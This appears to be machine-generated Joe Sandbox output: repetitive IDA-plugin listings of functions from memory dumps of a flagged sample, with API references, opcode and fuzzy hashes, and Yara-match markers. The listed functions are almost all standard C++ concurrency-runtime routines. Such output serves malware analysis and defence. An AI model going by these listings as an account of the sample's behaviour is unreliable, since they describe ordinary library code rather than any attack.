                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4284812201-0
                                                                                                                                                                                                                                                                • Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                                                                                                                                                                                • Instruction ID: 56b10c06773fd70edfe384cd871a397b27aa1454853719aef869861930285ec3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37F0B431640716ABAF247EBA081197E39A79F51314B04416FD51A9F3C0DFB19E019A94
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB
                                                                                                                                                                                                                                                                  • Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
                                                                                                                                                                                                                                                                  • Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990
                                                                                                                                                                                                                                                                • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
                                                                                                                                                                                                                                                                • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
                                                                                                                                                                                                                                                                • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4284812201-0
                                                                                                                                                                                                                                                                • Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                                                                                                                                                                                • Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525
                                                                                                                                                                                                                                                                  • Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
                                                                                                                                                                                                                                                                  • Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00413541
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00413565
                                                                                                                                                                                                                                                                  • Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1674182817-0
                                                                                                                                                                                                                                                                • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                • Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0249D088
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0249D0AC
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0249D0BF
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0249D0CD
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3657713681-0
                                                                                                                                                                                                                                                                • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                • Instruction ID: c2c36d04806251c681300089731a32846e2a6f0cdfc95268f4f24ee9a765d5f3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EEF05235E00204E7CF24FB62D840CAEBB7A9E90B18760852FD80517285DF31A90ACEA2
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::_Cnd_initX.LIBCPMT ref: 02485A83
                                                                                                                                                                                                                                                                • __Cnd_signal.LIBCPMT ref: 02485A8F
                                                                                                                                                                                                                                                                • std::_Cnd_initX.LIBCPMT ref: 02485AA4
                                                                                                                                                                                                                                                                • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02485AAB
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2059591211-0
                                                                                                                                                                                                                                                                • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                • Instruction ID: 7562e23720ca14c0881c1d58a19b0123a80bd25dcea8da757555e7901b0e7e6e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2F0E531520700EFEF227B73D80571E77A2AF01328F54482FE15A969A0CFBAE8558E55
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0249286F
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,02498830,?,?,?,?,00000000,?,00000000), ref: 0249287E
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02492894
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 024928A2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3803302727-0
                                                                                                                                                                                                                                                                • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                • Instruction ID: aec0aaa7c62f9fe8312bde4c062f1fbaf414c32f16c8700e1188f910ade556e2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0FF0A03490010ABBCF00EFA5CD44EAF3BBCAB00B01F200616B910E20A0DB74D6049B64
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041263B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3803302727-0
                                                                                                                                                                                                                                                                • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                • Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ___crtCreateEventExW.LIBCPMT ref: 02492593
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,02490DA0), ref: 024925A1
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024925B7
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 024925C5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 200240550-0
                                                                                                                                                                                                                                                                • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                • Instruction ID: c27784b29f73ed2c89e834a075d5c1cdddc6492e16024abb30fdb0025740cf24
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DFE0D871A0021639EB10F7B64C12F7F3A9C9B10B41F44085BBD14E51C1FED4D10049A4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ___crtCreateEventExW.LIBCPMT ref: 0041232C
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041235E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 200240550-0
                                                                                                                                                                                                                                                                • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                • Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 02492959: TlsAlloc.KERNEL32(?,02490DA0), ref: 0249295F
                                                                                                                                                                                                                                                                • TlsAlloc.KERNEL32(?,02490DA0), ref: 024A3BE6
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 024A3BF8
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A3C0E
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 024A3C1C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3735082963-0
                                                                                                                                                                                                                                                                • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                                                • Instruction ID: 1ba54625472139bf85578ddc668998a8cdbcdc7dec36a2a7e15fa6a4bcc1ea00
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CDE02274500202AFCB00BF769CA9A7A7E69AA107017100A6BE925D21A1FA34D0068E68
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                                                                                                                                                                                • TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00423991
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3735082963-0
                                                                                                                                                                                                                                                                • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                                                • Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,02490DA0,?,?,?,00000000), ref: 0249279E
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 024927AD
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024927C3
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 024927D1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3016159387-0
                                                                                                                                                                                                                                                                • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                • Instruction ID: 10975cf8d30a9dc56dda0ca23f26f8eaecd1c76986fdd7eab6668915f680aa8b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4E08074900109B7CF00FBB5DD45EAF77BC6A00B05B600566A501F3150EB65D7048B75
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,00410B39,?,?,?,00000000), ref: 00412537
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 00412546
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041256A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3016159387-0
                                                                                                                                                                                                                                                                • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                • Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(?,?), ref: 024928F8
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02492904
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0249291A
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02492928
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4286982218-0
                                                                                                                                                                                                                                                                • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                • Instruction ID: 97b46cdfd56066b73664fa90e266908f4a3d7342817f65d22067273f228c63ed
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7E086346001097BCF14FF72CC45FBB3B6CBB00B45B50092ABC15D20A1EF75D1048A98
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • TlsSetValue.KERNEL32(?,00000000,02497BD8,00000000,?,?,02490DA0,?,?,?,00000000,?,00000000), ref: 024929BE
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 024929CA
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024929E0
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 024929EE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1964976909-0
                                                                                                                                                                                                                                                                • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                • Instruction ID: c633e706738ef8ec576eb7664d22cfd30d45f5d3827684387e1aae06fce61679
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0E04F746001097ADF10FF618C48BBB3A6CAB00B45B50092AB919D10A0EB75D1149AA8
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041269D
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004126C1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4286982218-0
                                                                                                                                                                                                                                                                • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                • Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00412787
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1964976909-0
                                                                                                                                                                                                                                                                • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                • Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
